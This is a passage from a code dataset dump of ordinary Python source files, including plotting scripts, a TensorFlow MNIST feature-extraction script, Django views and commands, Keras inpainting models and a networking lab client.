25}\nrcParams.update(params)\n\nbcc=loadtxt(\"bcc/cohesive.dat\")\nfcc=loadtxt(\"fcc/cohesive.dat\")\ndia=loadtxt(\"diamond/cohesive.dat\")\nbcc_fit=loadtxt(\"bcc/fit.dat\")\nfcc_fit=loadtxt(\"fcc/fit.dat\")\ndia_fit=loadtxt(\"diamond/fit.dat\")\ntang=loadtxt(\"common_tangent.dat\")\n\nfig=figure(0,(12,10))\nax=fig.add_subplot(111)\nax.plot(bcc[:,0],bcc[:,1],'ro',ms=8)\nax.plot(fcc[:,0],fcc[:,1],'bo',ms=8)\nax.plot(dia[:,0],dia[:,1],'go',ms=8)\nax.plot(bcc_fit[:,0],bcc_fit[:,1],'r-',lw=2,label='bcc')\nax.plot(fcc_fit[:,0],fcc_fit[:,1],'b-',lw=2,label='fcc')\nax.plot(dia_fit[:,0],dia_fit[:,1],'g-',lw=2,label='diamond')\nax.plot(tang[:,0],tang[:,1],'kx-',ms=15,lw=3)\nax.plot([tang[0,0],tang[0,0]],tang[:,1],'k-',lw=1)\nax.plot(tang[:,0],[tang[-1,1],tang[-1,1]],'k-',lw=1)\nax.text(11.4,-5,'dE')\nax.text(14.8,-5.25,'dV')\nax.set_ylabel('Cohesive energy [eV]')\nax.set_xlabel('Volume [$\\mathrm{\\AA}^3$]')\nax.legend()\nfig.savefig('Maxwell_construction.pdf')\nfig.show()","sub_path":"tutroial/periodic_systems/reference/problem_3/plot_tangent.py","file_name":"plot_tangent.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121891782","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport re\n# %%\n_, __, files = next(os.walk('data'))\ncols=['Sample','Orientation','Run','Filetype']\nnamedf = pd.DataFrame(columns=cols)\nfiles = list(filter(lambda s: s.endswith('csv'),files))\nfindletters = re.compile('[a-zA-Z]+')\nfinddigits = re.compile('\\d+')\n# %%\nfor filename in files:\n pieces = filename.split('.')\n dline = {}\n # collect 'c' or 'x' character from end of last piece before extension\n dline['Filetype'] = pieces[-2][-1]\n stems = pieces[0].split('-')\n dline['Sample'] = findletters.findall(stems[0])[0]\n dline['Orientation'] = finddigits.findall(stems[0])[0]\n prelength = len(dline['Sample'])+len(dline['Orientation'])\n dline['Run'] = stems[0][prelength:]\n newline = pd.DataFrame(dline,columns=cols,index=[0])\n namedf = namedf.append(newline,ignore_index=True)\n# %%\nnamedf.sort_values(cols,ascending=[True,False,True,True],inplace=True)\ndef namegrab(text1,text2,text3,df,filelist):\n \"\"\"Finds the filename in a list that matches text1 and text2\n in columns 1-3 of the dataframe and has the lower value\n for column 4 because we trust csvs more than workbooks.\"\"\"\n text4 = df[(df.iloc[:,0]==text1)&(df.iloc[:,1]==text2)&(df.iloc[:,2]==text3)].iloc[:,3].min()\n for name in filelist:\n if (text1 in name)&(str(text2) in name)&(str(text3) in name)&(text4 in name):\n return name\n return None\n# %%\nplotdict = {}\nsamples = namedf['Sample'].unique()\nfor sample in samples:\n plotdict[sample]={}\n or_list = list(namedf[namedf['Sample']==sample].Orientation.unique())\n for orient in or_list:\n plotdict[sample][orient]={}\n run_list = list(namedf[(namedf['Sample']==sample)&\n (namedf['Orientation']==orient)].Run.unique())\n for run in run_list:\n plotdict[sample][orient][run]=namegrab(sample,orient,run,namedf,files)\n# %%\nfor sample in plotdict:\n orients = list(plotdict[sample].keys())\n if '100' in orients:\n orients.remove('100')\n for run in plotdict[sample]['100'].keys():\n df100 = pd.read_csv('data/'+plotdict[sample]['100'][run])\n plt.plot(df100.iloc[:,1],df100['Alpha'],lw=2,c='r',label='100 '+run)\n if '010' in orients:\n orients.remove('010')\n for run in plotdict[sample]['010'].keys():\n df010 = pd.read_csv('data/'+plotdict[sample]['010'][run])\n plt.plot(df100.iloc[:,1],df100['Alpha'],lw=2,c='g',label='010 '+run)\n if '001' in orients:\n orients.remove('001')\n for run in plotdict[sample]['001'].keys():\n df001 = pd.read_csv('data/'+plotdict[sample]['001'][run])\n plt.plot(df001.iloc[:,1],df001['Alpha'],lw=2,c='b',label='001 '+run)\n if len(orients) > 0:\n for orient in orients:\n for run in plotdict[sample][orient].keys():\n df000 = pd.read_csv('data/'+plotdict[sample][orient][run])\n plt.plot(df000.iloc[:,1],df000['Alpha'],lw=2,c='black',label=orient+' '+run)\n plt.title(sample)\n plt.xlabel('Temp (Celsius)')\n plt.ylabel('Linear Thermal Exp.')\n plt.legend()\n plt.savefig('testplots/'+sample+'.tif')\n plt.show()\n plt.clf()","sub_path":"plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"534184174","text":"from allauth.account.utils import user_username, user_email, user_field\nfrom allauth.socialaccount.adapter import DefaultSocialAccountAdapter\nfrom allauth.utils import valid_email_or_none\n\n\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n # def save_user(self, request, sociallogin, form=None):\n# #\n# # user = super(SocialAccountAdapter, self).save_user(request, sociallogin, form)\n# #\n# # social_app_name = sociallogin.account.provider.upper()\n# # # extra_data = user.extra_data()\n# #\n# # if social_app_name == \"GOOGLE\":\n# # User.objects.get_or_create_google_user(user_pk=user.pk, extra_data = extra_data) #extra_data\n# #\n# # elif social_app_name == \"KAKAO\":\n# # User.objects.get_or_create_kakao_user(user_pk=user.pk, extra_data = extra_data)\n def populate_user(self,\n request,\n sociallogin,\n data):\n social_app_name = sociallogin.account.provider.upper()\n if social_app_name == \"GOOGLE\":\n username = data.get('last_name') + data.get('first_name')\n\n first_name = data.get('first_name')\n last_name = data.get('last_name')\n email = data.get('email')\n name = data.get('name')\n user = sociallogin.user\n user_username(user, username or '')\n user_email(user, valid_email_or_none(email) or '')\n name_parts = (name or '').partition(' ')\n user_field(user, 'first_name', first_name or name_parts[0])\n user_field(user, 'last_name', last_name or name_parts[2])\n return user","sub_path":"adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307796705","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport model\n\nmodel_dir = './lenet-5/'\nmnist = input_data.read_data_sets(\"mnist_data\", one_hot=True)\n\nx = tf.placeholder(tf.float32, [None, 784])\ny_ = tf.placeholder(tf.float32, [None, 10])\nimage = tf.reshape(x, [-1, 28, 28, 1])\nkeep_prob = tf.placeholder(tf.float32)\ny, intermediate, conv1, conv2 = model.lenet_5(image, keep_prob)\npredicted = tf.argmax(y, 1)\nlabel = tf.argmax(y_, 1)\ncorrect = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n\nsaver = tf.train.Saver()\ninit = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\nconfig = tf.ConfigProto(allow_soft_placement=True)\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint(model_dir))\n print('restore succeed.')\n\n samples = []\n neg_samples = []\n # pred = []\n ground = []\n neg_predict = []\n neg_ground = []\n c1 = []\n c2 = []\n equal = 0\n flag = True\n stat = np.zeros(10)\n for i in range(55000):\n images = mnist.train.images[i:i+1, :]\n labels = mnist.train.labels[i:i+1, :]\n feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n intermediateValues, predictedNp, labelNp, weight_fc2 = sess.run([intermediate, predicted, label, conv1], feed_dict=feed_dict)\n # stat[labelNp[0]] += 1\n if predictedNp == labelNp:\n equal += 1\n samples.extend(intermediateValues)\n ground.extend(labelNp)\n # if flag:\n c1.extend(weight_fc2)\n # c2.extend(weight_fc3)\n # flag = False\n else:\n neg_samples.extend(intermediateValues)\n neg_predict.extend(predictedNp)\n neg_ground.extend(labelNp)\n\n # for i in range(5000):\n # images = mnist.validation.images[i:i + 1, :]\n # labels = mnist.validation.labels[i:i + 1, :]\n # feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n # intermediateValues, predictedNp, labelNp, weight_fc2 = sess.run([intermediate, predicted, label, conv1], feed_dict=feed_dict)\n # # stat[labelNp[0]] += 1\n # if predictedNp == labelNp:\n # equal += 1\n # samples.extend(intermediateValues)\n # ground.extend(labelNp)\n # # if flag:\n # c1.extend(weight_fc2)\n # # c2.extend(weight_fc3)\n # # flag = False\n # else:\n # neg_samples.extend(intermediateValues)\n # neg_predict.extend(predictedNp)\n # neg_ground.extend(labelNp)\n\n samples = np.array(samples)\n ground = np.array(ground)\n neg_samples = np.array(neg_samples)\n neg_predict = np.array(neg_predict)\n neg_ground = np.array(neg_ground)\n print(equal)\n print(samples.shape, ground.shape)\n # print(stat)\n np.save('training_set_neuron_outputs', samples)\n np.save('training_set_labels', ground)\n np.save('training_set_error_outputs', neg_samples)\n np.save('training_set_error_predicts', neg_predict)\n np.save('training_set_error_labels', neg_ground)\n np.save('conv1', c1)\n # np.save('conv2', c2)\n\n samples_test = []\n pred_test = []\n label_test = []\n equal = 0\n none = 0\n for i in range(10000):\n images = mnist.test.images[i:i+1, :]\n labels = mnist.test.labels[i:i+1, :]\n feed_dict = {x: images, y_: labels, keep_prob: 1.0}\n intermediateValues, predictedNp, labelNp, = sess.run([intermediate, predicted, label], feed_dict=feed_dict)\n if predictedNp == labelNp:\n equal += 1\n else:\n none += 1\n samples_test.extend(intermediateValues)\n pred_test.extend(predictedNp)\n label_test.extend(labelNp)\n samples_test = np.array(samples_test)\n pred_test = np.array(pred_test)\n label_test = np.array(label_test)\n\n print(equal, none)\n print(samples_test.shape, pred_test.shape, label_test.shape)\n np.save('test_set_neuron_outputs', samples_test)\n np.save('test_set_predictions', pred_test)\n np.save('test_set_labels', label_test)\n\n color = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22',\n '#17becf']\n pca = TSNE(n_components=2)\n samples_reduction = pca.fit_transform(samples)\n plt.figure(1)\n for i in range(10):\n print(samples_reduction[ground == i, 0].shape)\n plt.scatter(samples_reduction[ground == i, 0], samples_reduction[ground == i, 1], c=color[i], marker='o', s=2, linewidths=0, alpha=0.8, label='%s' % i)\n plt.show()\n","sub_path":"compute_intervalues.py","file_name":"compute_intervalues.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142432712","text":"import numpy as np\r\n\r\nimport types\r\n\r\ndef is_prime(n):\r\n \"\"\"simple function to check if a given integer is prime\"\"\"\r\n # no change necessary here\r\n\r\n if n <= 1:\r\n return False\r\n\r\n if n > 2 and n % 2 == 0:\r\n return False\r\n\r\n for i in range(3, int(np.sqrt(n)) + 1, 2):\r\n if n % i == 0:\r\n return False\r\n\r\n return True\r\n\r\n\r\ndef pretty_print_bool_array(array):\r\n \"\"\"this function will print a boolean array such that True values are 'x'\r\n and False values are '.'\"\"\"\r\n\r\n with np.printoptions(formatter={\"bool\": lambda b: \"x\" if b else \".\"}):\r\n print(array)\r\n\r\n\r\ndef imports_of_your_file(filename, testfile):\r\n \"\"\" Yields all imports in the testfile. \"\"\"\r\n\r\n for name, val in vars(testfile).items():\r\n if isinstance(val, types.ModuleType):\r\n # get direct imports\r\n yield val.__name__\r\n\r\n else:\r\n # get from x import y imports\r\n imprt = getattr(testfile, name)\r\n\r\n if hasattr(imprt, \"__module__\") and not str(imprt.__module__).startswith(\"_\") and not str(imprt.__module__) == filename:\r\n yield imprt.__module__\r\n\r\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"109456656","text":"N, Y = map(int, input().split())\nflag = False\n\nfor i in range(0, N+1): # 10000\n for j in range(0, N+1-i): # 5000\n if 10000*i + 5000*j + 1000*(N-i-j) == Y:\n print(i, j, N-i-j)\n flag = True\n break\n if flag:\n break\nelse:\n if not flag:\n print(\"-1 -1 -1\")\n","sub_path":"Day1/ABC_085C.py","file_name":"ABC_085C.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"551412537","text":"from . import *\nfrom sqlalchemy.sql import exists\nimport json\nimport os\n\n\ndef _func(path):\n print(path)\n with open(path) as f:\n accounts = json.load(f)\n for account in accounts:\n if db.session.query(exists().where(\n OfficialAccount.accountname==account['accountname']\n )).scalar():\n print(\"official account %s already exits\" % account['accountname'])\n continue\n a = OfficialAccount(accountname=account['accountname'],\n avatar=account['avatar'], description=account['description'],\n page_url=account['page_url'])\n db.session.add(a)\n print(\"create official account %s\" % account['accountname'])\n db.session.commit()\n print(\"generate offical account success\")\n\ndef generate_official_accounts():\n print('generating official accounts...')\n paths = [\n 'scripts/sync_buaa_art_news_accounts.json',\n 'scripts/sync_buaa_news_accounts.json',\n 'scripts/sync_weibo_accounts.json',\n 'scripts/sync_weixin_accounts.json',\n ]\n for p in paths:\n _func(p)\n\n","sub_path":"scripts/generate_official_accounts.py","file_name":"generate_official_accounts.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"123660637","text":"#\n# Copyright 2020 University of Toronto\n#\n# Permission is hereby granted, to use this software and associated\n# documentation files (the \"Software\") in course work at the University\n# of Toronto, or for personal use. Other uses are prohibited, in\n# particular the distribution of the Software either publicly or to third\n# parties.\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nimport socket\nimport datetime\nimport select\nfrom ece361.lab2.frame import Frame\n\n\nserver_address = ('192.168.1.1', 10000)\nsend_queue = []\n\nfor i in range(10):\n # create a new Frame with sequence number i, a message and 1 second ack timeout\n new_frame = Frame(seqnum=i,\n data=('This is message # ' + str(i)).encode('ascii'),\n destination=server_address,\n timeout=1)\n send_queue.append(new_frame)\n\nt_start = datetime.datetime.now()\n\n# send all frames at once\nfor frame in send_queue:\n frame.send()\n\nframe_timedout = 0\nframe_delivered = 0\n\n# repeat until all frames either receive a response or time out\nwhile send_queue != []:\n # will block until at least one frame receives some feedback (ACK/NACK, timed out etc.)\n Frame.wait_for_multiple_ack_nacks(send_queue)\n\n # at least one frame receives feedback, go through the send queue\n # we have to go through the queue in reverse because we are removing elements from the queue in the loop\n # if you don't believe that try write the loop the other way and you will see problems\n for i in range(len(send_queue) - 1, -1, -1):\n if (send_queue[i].status() == Frame.Status.ack_nacked):\n # frame received by the other side\n frame_delivered += 1\n # retrieve the acknowledgement frame, which is a frame with only sequence number and no data\n ack_frame = send_queue[i].retrieve_ack_nack()\n # print the original message, the ACK/NACK and the RTT\n print(send_queue[i].data,\n 'DELIVERED. ACK:', ack_frame.seqnum,\n 'RTT:', send_queue[i].socket.t_ack - send_queue[i].socket.t_send)\n\n # remove frame from send queue\n send_queue.remove(send_queue[i])\n elif (send_queue[i].status() == Frame.Status.timedout):\n # timedout\n frame_timedout += 1\n print(send_queue[i].data, 'TIMED OUT.')\n\n # remove frame from send queue\n send_queue.remove(send_queue[i])\n else:\n # frame is still in flight. do nothing.\n pass\n\nt_finish = datetime.datetime.now()\n\nprint(\"Frames delivered:\", frame_delivered)\nprint(\"Frames timed out:\", frame_timedout)\nprint(\"Total transmission time:\", t_finish - t_start)\n","sub_path":"lab2/example/client_improved.py","file_name":"client_improved.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"359299993","text":"\"\"\"\n\n _models.py\n\nModel definitions to use for building feature extractors\n\"\"\"\nimport tensorflow as tf\n\n_alex_layers = [\n (96, 11, 4),\n \"M\",\n (256, 5, 1),\n \"M\",\n (384, 3, 1),\n (384, 3, 1),\n (256, 3, 1),\n \"M\"\n ]\n\ndef BNAlexNetFCN(num_channels=3):\n \"\"\"\n Like the conv layers of AlexNet, using Batch Norm instead of LRN.\n \n :num_channels: number of channels for input image.\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n for l in _alex_layers:\n if l == \"M\":\n net = tf.keras.layers.MaxPool2D(3,2)(net)\n else:\n k, w, s = l\n # changed same to valid\n net = tf.keras.layers.Conv2D(k, w, strides=s, padding=\"same\",\n activation=\"relu\")(net)\n net = tf.keras.layers.BatchNormalization()(net)\n return tf.keras.Model(inpt, net)\n \n\n\n \n\ndef build_encoder(num_channels=3):\n \"\"\"\n Inpainting encoder model from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n #for k in [64, 64, 128, 256, 512]:\n for k in [32, 64, 128, 256, 512]:\n net = tf.keras.layers.Conv2D(k, 4, strides=2, padding=\"same\")(net)\n net = tf.keras.layers.LeakyReLU(alpha=0.2)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n return tf.keras.Model(inpt, net, name=\"encoder\")\n\n\ndef build_decoder(input_channels=512, num_channels=3):\n \"\"\"\n Inpainting decoder from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, input_channels))\n net = inpt\n\n #for k in [512, 256, 128, 64, 64]:\n for k in [512, 256, 128, 64, 32]:\n net = tf.keras.layers.Conv2DTranspose(k, 4, strides=2, \n padding=\"same\",\n activation=tf.keras.activations.relu)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n \n net = tf.keras.layers.Conv2D(num_channels, 3, strides=1, padding=\"same\", \n activation=tf.keras.activations.sigmoid)(net)\n return tf.keras.Model(inpt, net, name=\"decoder\")\n\n\ndef build_discriminator(num_channels=3):\n \"\"\"\n Inpainting discriminator from Pathak et al\n \"\"\"\n inpt = tf.keras.layers.Input((None, None, num_channels))\n net = inpt\n for k in [64, 128, 256, 512]:\n net = tf.keras.layers.Conv2D(k, 4, strides=2, padding=\"same\",\n activation=tf.keras.activations.relu)(net)\n net = tf.keras.layers.BatchNormalization()(net)\n net = tf.keras.layers.GlobalMaxPool2D()(net)\n net = tf.keras.layers.Dense(1, activation=tf.keras.activations.sigmoid,\n name=\"disc_pred\")(net)\n return tf.keras.Model(inpt, net, name=\"discriminator\")","sub_path":"patchwork/feature/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"209481567","text":"from PIL import Image\nfrom pylab import *\nimport numpy as np\nim = array(Image.open(\"./oriimage.jpg\"))\nr = im[:,:,0]\ng = im[:,:,1]\nb = im[:,:,2]\nr, g, b = r / 255.0, g / 255.0, b / 255.0\nr= np.matrix(r)\ng= np.matrix(g)\nb= np.matrix(b)\nY = 65.481*r+128.553*g+ 24.966*b+16\nCb = -37.797*r-74.203*g+112*b+128\nCr = 112*r-93.786*g-18.214*b+128\nimage1 = Image.fromarray(Y)\nimage1.show()\nimage2 = Image.fromarray(Cb)\nimage2.show()\nimage3 = Image.fromarray(Cr)\nimage3.show()\n","sub_path":"RGB-to-YCbCr.py","file_name":"RGB-to-YCbCr.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"533722987","text":"#!/usr/bin/env python\nfrom carddeck import CardDeck\n\nclass JokerDeck(CardDeck):\n\n def _make_deck(self):\n super()._make_deck() # call ancestor's method\n joker1 = 'J1', \"Joker\"\n joker2 = 'J2', 'Joker'\n self._cards.append(joker1)\n self._cards.append(joker2)\n\n\n","sub_path":"jokerdeck.py","file_name":"jokerdeck.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"150314817","text":"import datetime\nimport os\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom dbfiles.models import DBFile\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\n \"--clear\",\n action=\"store_true\",\n default=False,\n help=\"Clears out the db_file table before importing\",\n )\n parser.add_argument(\n \"--path\",\n default=settings.MEDIA_ROOT,\n help=\"The root directory to import into the db_file table\",\n )\n\n def handle(self, *args, **options):\n if options[\"clear\"]:\n DBFile.objects.all().delete()\n media_root = os.path.abspath(options[\"path\"])\n for root, dirs, files in os.walk(media_root):\n for f in files:\n if f.startswith(\".\"):\n continue\n file_path = os.path.join(root, f)\n rel_path = os.path.relpath(file_path, media_root)\n if DBFile.objects.filter(name=rel_path).exists():\n print('\"%s\" already exists in the database, skipping' % rel_path)\n continue\n mtime = os.path.getmtime(file_path)\n mod_time = timezone.make_aware(\n datetime.datetime.utcfromtimestamp(mtime), timezone.utc\n )\n with open(file_path, \"rb\") as f:\n print('Importing \"%s\"' % rel_path)\n DBFile.objects.create(\n content=f.read(),\n name=rel_path,\n created_on=mod_time,\n updated_on=mod_time,\n )\n","sub_path":"dbfiles/management/commands/dbfiles_import.py","file_name":"dbfiles_import.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"364442516","text":"from django.shortcuts import render\nfrom .models import ImagesLogo\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\n\n\n# Create your views here.\ndef main(request):\n img_obj = ImagesLogo.objects.all()\n p = Paginator(img_obj, 6)\n page = request.GET.get('page')\n try:\n get_img = p.page(page)\n except PageNotAnInteger:\n get_img = p.page(1)\n except EmptyPage:\n get_img = p.page(p.num_pages)\n\n return render(request, 'main.html', {'images': get_img})\n\n\ndef test_main(request):\n img_obj = ImagesLogo.objects.all()\n p = Paginator(img_obj, 6)\n page = request.GET.get('page')\n try:\n get_img = p.page(page)\n except PageNotAnInteger:\n get_img = p.page(1)\n except EmptyPage:\n get_img = p.page(p.num_pages)\n\n return render(request, 'testpage.html', {'images': get_img})\n\n\ndef form_view(request):\n errors = []\n form = {}\n if request.POST:\n form['name'] = request.POST.get('name')\n form['email'] = request.POST.get('email')\n form['message'] = request.POST.get('message')\n\n if not form['name']:\n errors.append('Заполните Имя')\n if '@' not in form['email']:\n errors.append('Введите корректный email')\n if not form['message']:\n errors.append('Введите Сообщение')\n if not errors:\n print(form)\n return HttpResponse('Спасибо за ваше сообщение!')\n return render(request, 'forms.html', {'errors': errors, 'form': form})\n","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"423496356","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Volumes/data/proj/subarulink/subarulink/lock.py\n# Compiled at: 2020-03-30 09:00:20\n# Size of source mod 2**32: 1841 bytes\n\"\"\"\nPython Package for controlling Subaru API.\n\nFor more details about this api, please refer to the documentation at\nhttps://github.com/G-Two/subarulink\n\"\"\"\nfrom subarulink.vehicle import VehicleDevice\n\nclass Lock(VehicleDevice):\n __doc__ = 'Home-assistant lock class for Subaru vehicles.\\n\\n This is intended to be partially inherited by a Home-Assitant entity.\\n '\n\n def __init__(self, data, controller):\n super().__init__(data, controller)\n self._Lock__manual_update_time = 0\n self._Lock__lock_state = False\n self.type = 'door lock'\n self.hass_type = 'lock'\n self.name = self._name()\n self.uniq_name = self._uniq_name()\n self.bin_type = 7\n\n async def lock(self):\n \"\"\"Send lock command.\"\"\"\n data = await self._controller.lock(self._vin)\n if data:\n if data['data']['success']:\n self._Lock__lock_state = True\n\n async def unlock(self):\n \"\"\"Send unlock command.\"\"\"\n data = await self._controller.unlock(self._vin)\n if data:\n if data['data']['success']:\n self._Lock__lock_state = False\n\n def is_locked(self):\n \"\"\"Return whether doors are locked.\n\n Subaru API does not report lock status. This state cannot be depended on.\n \"\"\"\n return self._Lock__lock_state\n\n @staticmethod\n def has_battery():\n \"\"\"Return whether the device has a battery.\"\"\"\n return False","sub_path":"pycfiles/subarulink-0.1.0-py3-none-any/lock.cpython-37.py","file_name":"lock.cpython-37.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"114956901","text":"from django.shortcuts import render,redirect\nfrom django.core.mail import send_mail\nfrom . import forms\nfrom credentials import models as cre_models\nimport os\n# Create your views here.\n\ndef sendEmail(request, receiver):\n\n\n\tlink = cre_models.Resume.objects.get(id__exact=1).link\n\temail_id = cre_models.Resume.objects.get(id__exact=1).email_id\n\ttext = \"This is my resume link\\n\" + str(link)\n\tmy_text = \"Your link has been shared with \" + str(receiver)\n\tsend_mail(\"Resume Link\",text,'EMAIL_HOST_USER',[receiver],fail_silently = False)\n\tsend_mail(\"Resume Viewed\",my_text,'EMAIL_HOST_USER',[email_id],fail_silently = False)\n\n\n# \tjump_url = f'https://harshdeepsingh.herokuapp.com/send/{receiver}/'\n# \trequests.get(jump_url)\n\n\treturn redirect('credentials:index')\n\ndef getReceiver(request):\n\tif request.method == 'POST':\n\t\tform = forms.ReceiverForm(request.POST)\n\t\tif form.is_valid():\n\t\t\temail_id = form.cleaned_data['email_id']\n\t\t\treturn redirect('emails:send', receiver=email_id)\n\t\telse:\n\t\t\treturn HttpResponse(\"Oops! Something went wrong. Please try again\")\n\telse:\n\t\tform = forms.ReceiverForm()\n\t\treturn render(request, 'index.html', {'form':form})","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"138424960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA module that contains general types that can be subclassed to create new plot types.\n\"\"\"\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom src.input_file import input_file_types as inp_types\n\n\t\ndef plot_xyz_data(ats, a=False, args={}):\n\t\"\"\"\n\tA general function to plot atomic coord data.\n\n\tInputs:\n\t\t* ats => (natom, 3)\n\t\"\"\"\n\tdefault_args = {'ls': 'None', 'marker': '.'}\n\tfor i in args: default_args[i] = args[i]\n\n\tif a is False:\n\t\tf = plt.figure()\n\t\ta = f.add_subplot(111, projection=\"3d\")\n\n\t\ta.set_xlabel(\"X\")\n\t\ta.set_ylabel(\"Y\")\n\t\ta.set_zlabel(\"Z\")\n\n\t\ta.view_init(elev=-3, azim=64)\n\n\t\ta.set_xticks([])\n\t\ta.set_yticks([])\n\t\ta.set_zticks([])\n\n\ta.plot(ats[:, 0], ats[:, 1], ats[:, 2], **default_args)\n\n\treturn a\n\nclass Plot_Type(object):\n\t\"\"\"\n\tA type containing some useful functions that can be inheritted when creating a new calc type.\n\n\tInputs:\n\t\t* Variable => An instance of the Variable class.\n\n\tPublic Methods:\n\t\t* calc => To be overridden to calculate the property in question.\n\t\"\"\"\n\trequired_metadata = ()\n\trequired_var_attributes = ()\n\n\tname = \"General Plot Type\"\n\n\tdef __init__(self, Variable):\n\t\t\"\"\"\n\t\tJust check we have the required properties for calculating the quantitiy.\n\t\t\"\"\"\n\t\tself.Var = Variable\n\n\t\t# Copy all data to make it unique for each instance\n\t\tall_vars = [i for i in dir(self) if i[0] != '_']\n\t\tfor i in all_vars:\n\t\t\tif i[0] != '_':\n\t\t\t\tvar = getattr(self, i)\n\t\t\t\tif not callable(var) and isinstance(var, (dict, list, tuple)):\n\t\t\t\t\tsetattr(self, i, copy.deepcopy(var))\n\n\t\t# Set the default parameters\n\t\tfor key in self._defaults:\n\t\t\tif key not in self.Var.metadata:\n\t\t\t\tself.Var.metadata[key] = self._defaults[key]\n\n\t\t\tself.metadata[key] = self.Var.metadata[key]\n\n\t\t# Check we have all the data we need to calculate the property\n\t\tfor key in self.required_metadata:\n\t\t\tif key not in self.Var.metadata:\n\t\t\t raise KeyError(f\"Please load the data '{key}' into the variable '{self.Var.name}'\")\n\t\t\telse:\n\t\t\t self.metadata[key] = self.Var[key]\n\n\t\t# Check the input variable has the required attributes\n\t\tfor attr in self.required_var_attributes:\n\t\t\tif not hasattr(self.Var, attr):\n\t\t\t\tif hasattr(self.Var, \"data\"):\n\t\t\t\t\tif type(self.Var.data) == inp_types.Vars:\n\t\t\t\t\t\tfound = False\n\t\t\t\t\t\tfor key in self.Var.data:\n\t\t\t\t\t\t\tif hasattr(self.Var.data[key], attr):\n\t\t\t\t\t\t\t\tsetattr(self.Var, attr, getattr(self.Var.data[key], attr))\n\t\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tif found: continue\n\n\n\t\t\t\t\telif 